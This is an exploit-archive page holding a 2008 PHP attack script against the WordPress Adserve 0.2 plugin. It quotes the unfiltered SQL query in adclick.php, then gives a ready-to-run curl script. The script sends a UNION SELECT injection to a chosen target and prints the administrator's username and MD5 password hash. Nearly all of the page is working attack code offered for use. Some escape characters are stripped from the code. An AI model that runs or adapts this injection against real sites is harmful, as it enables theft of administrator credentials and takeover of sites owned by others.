[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit
# Published : 2008-01-30
# Author : enter_the_dragon
# Previous Title : Connectix Boards <= 0.8.2 template_path Remote File Inclusion Exploit
# Next Title : Mambo Component Recipes 1.00 (id) Remote SQL Injection Vulnerability 


<?
# WordPress Adserve plugin v 0.2 Sql Injection Exploit 
#
# Plugin Homepage-http://www.irisco.it/?page_id=40
# 	
# Found by:enter_the_dragon
# 

# Vuln code
#
# -In adclick.php
#
# if (isset($_GET['id'])) {
#    Header("Location: ".iri_AdServe_BannerClick($_GET['id'])
#	
# -In  iri_AdServe_BannerClick function
#   
# 	return $wpdb->get_var("SELECT url FROM $table_name WHERE id=$id;");  
#
#
# 

# Exploit
# 
# id variable isnt filtered so we can inject and check the output in the Location response-header 
# If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved
#
# 




echo "n";
echo "-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------"."n";
echo "-------------------coded by : enter_the_dragon--------------------"."n";
echo "------------------------------------------------------------------"."n";
if ($argc!=3)
{
echo " Usage:	$argv[0] target_host wp_path n";
echo " target_host:	Your target ex www.target.com n";
echo " wp_path:	WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";	     
echo "n";
exit;
}


$query=$argv[1];
$query.=$argv[2];
$query.="wp-content/plugins/wp-adserve/adclick.php?";
$query.="id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";

  
if(function_exists(curl_init))
{
  $ch = curl_init("http://$query");
  curl_setopt($ch, CURLOPT_HEADER,true);
  curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
  curl_setopt($ch, CURLOPT_TIMEOUT,10);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");  
  $html=curl_exec($ch);
  $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
  curl_close($ch);

  if($returncode==302)
     {  
	$pattern="/|(.*)?|([a-z0-9]{32})|/";
        if(preg_match($pattern,$html,$matches))
          {
           $adminusername=$matches[1];
           $adminpass=$matches[2];
	   echo "Admin Login:$adminusernamen" ;
     	   echo "Admin Pass :$adminpassn";	    
	  }
     }		    
	else 
     {
	exit ("Exploit Failed :( n");
     }	


}
else
exit("Error:Libcurl isnt installed n");

?>

# www.Syue.com [2008-01-30]